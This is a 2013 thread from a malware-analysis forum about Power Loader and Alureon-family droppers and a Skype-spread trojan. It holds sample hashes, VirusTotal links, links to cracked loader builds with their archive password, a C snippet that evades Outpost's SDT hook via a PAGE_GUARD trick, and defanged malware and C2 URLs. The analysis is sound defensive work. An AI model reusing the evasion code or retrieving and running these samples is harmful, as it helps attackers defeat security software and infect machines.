A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #18730  by EP_X0FF
 Thu Mar 28, 2013 2:31 am
Part of Win32/Alureon family with Gapz style inject (see @004049C0 and @004045D0). Moved.

Expect more and more copy-paste, see this trojan development topic as example (and for original inject method author see post #4)
hxxp://wasm.ru/forum/viewtopic.php?id=47590
 #18977  by EP_X0FF
 Wed Apr 17, 2013 6:44 am
@readyde

You chose wrong forum to post this. Solve your malware "business" problems elsewhere. We do not create/support malware here and this forum is not script-kiddie malware marketplace for this kind of "blacklisting". This behaviour is not welcomed and furthermore, next time whoever gonna try to do this again, will be immediatelly and permanently banned.

Posts disapproved.
 #18978  by EP_X0FF
 Wed Apr 17, 2013 6:55 am
Another power loader + payload (bitcoin miner). Both in attach.

SHA256: 9507b7eabaf22758ad6724f4e63c6772e04992f42b56e1281571b3fbeba00a3a
SHA1: 9d9ae3d4d8a0f0959e84a098483debe19811adf6
MD5: 06708d4bb90b6d3761b62302dbf96f36

https://www.virustotal.com/en/file/9507 ... /analysis/

SHA256: 10bfd9746863fd90e7c7b204a2a0a0c529f12b5a7dea51858e81f32698c168f8
SHA1: 745fbaf750124630f9c440f24d7753c582a748ad
MD5: 5c99411fa8a11691771a476ff52a9344

https://www.virustotal.com/en/file/10bf ... /analysis/
Attachments
pass: infected
(306.7 KiB) Downloaded 99 times
 #18986  by rinn
 Wed Apr 17, 2013 8:02 pm
grum wrote::D cracked public now

annloader_1d 2011

http://goo.gl/wUIBl

pass: gangcash@jabber.org


PowerLoader_v2.0

http://goo.gl/LLJXT

pass: gangcash@jabber.org
It is a bit out-dated. Power Loader available since last autumn and except using public explorer.exe ACE bug in addition has a specific code against Outpost product. Well, it is using same trick I've been using last 2 years in penetration testing toolkit (alongside with couple of other still private unseen in itw malware methods), mentioned here http://www.kernelmode.info/forum/viewto ... 5&start=60
Code: Select all
	PCLIENT_ID pcid;
	OBJECT_ATTRIBUTES obja;
	DWORD fOldProtect;

	if (IsProcessRunning(L"op_mon.exe")) {

		pcid = (CLIENT_ID *)VirtualAlloc(NULL, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
		pcid->UniqueProcess = ExplorerPID;
		VirtualProtect(pcid, PAGE_SIZE, PAGE_READWRITE | PAGE_GUARD, &fOldProtect);
		InitializeObjectAttributes(&obja, 0, 0, 0, NULL);
		NtStatus = NtOpenProcess(&hProcess, PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, &obja, pcid);
		if ( !NT_SUCCESS(NtStatus) ) {
			hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, ExplorerPID);
		}
	}
Idea of this method - abuse badly written handler of SDT hook. When Outpost will try to access NtOpenProcess parameters it will catch a exception because CLIENT_ID is memory marked with PAGE_GUARD flag. Once exception occurred Outpost transfers control to original Windows service, thinking all OK. This is a example of mindless coding style, so often seen in security drivers. Lack of professionalism as it is.

Attached loader retrieved from from EP_X0FF sample. For code I mention look at function located at address 0x00404830.

Best Regards,
-rin
Attachments
password "infected" w/o quotes
(24.89 KiB) Downloaded 93 times
 #19274  by EP_X0FF
 Wed May 15, 2013 10:10 am
SHA256: a5d9b4226432b63eac41b5e47e1e277730fcd31d00d25bec31095de12c7777b3
SHA1: c2b50af1220aeaf076ada73665a734634d15ec5d
MD5: 2dff72099f977da97672e01e7f4ca2e1

https://www.virustotal.com/en/file/a5d9 ... /analysis/

Original, decrypted dropper + extracted x64 binary in attach.

x86-32
https://www.virustotal.com/en/file/4b88 ... 368612442/

x64
https://www.virustotal.com/en/file/53e1 ... 368612443/

x86-32 quote (OutputDebugString)
Is what you've seen too much to take, or are you blind and seeing nothing? Through senses, what can we explain? Not joy, not guilt, not pain So run my baby run my baby run
x64 quote (OutputDebugString)
I'm tired holding up the weight,the weight of the motherfucking world! Am I too last to be saved? Am I too last? The boys wanna fight
Attachments
pass: infected
(122.54 KiB) Downloaded 110 times
 #19351  by kekieres
 Mon May 20, 2013 7:00 pm
I've recently received a malware sample .

Spreading mechanisms: you receive a chat message from an skype contact saying (in spanish)
"esta es una foto muy amable de tu parte "
(It's gramatically correct but it doesn't sound natural in spanish)
And the the following URL:
hXXp://goo.gl/lLGdM?png=<your_skype_contact_name>
In fact parameters are irelevant.
Independently to the parameters it allways expands to:
hXXp://dc663.4shared.com/download/arUNCWir?clientType=BASE_WEB

The malware comes into a ZIP file and inside the EXE named: fotos_facebook-20052013-png.exe
SHA1: 882da1b7838bc087c753a14b0dd1e40cd3db78d3
Here you have the sample.
Right now it's almost undetected in virustotal (3/47).
I'm not good at reverse engineering and deep malware analysis, but I've used malwr.com to do a dynamic analysis (https://malwr.com/analysis/ZDdkOWViY2Qy ... TJjZTU5N2E)
Obviously it's nothing good. It tries to contact hXXp://r.gigaionjumbie.biz/images/gx.php

Is it a known malware?
Attachments
(68.21 KiB) Downloaded 81 times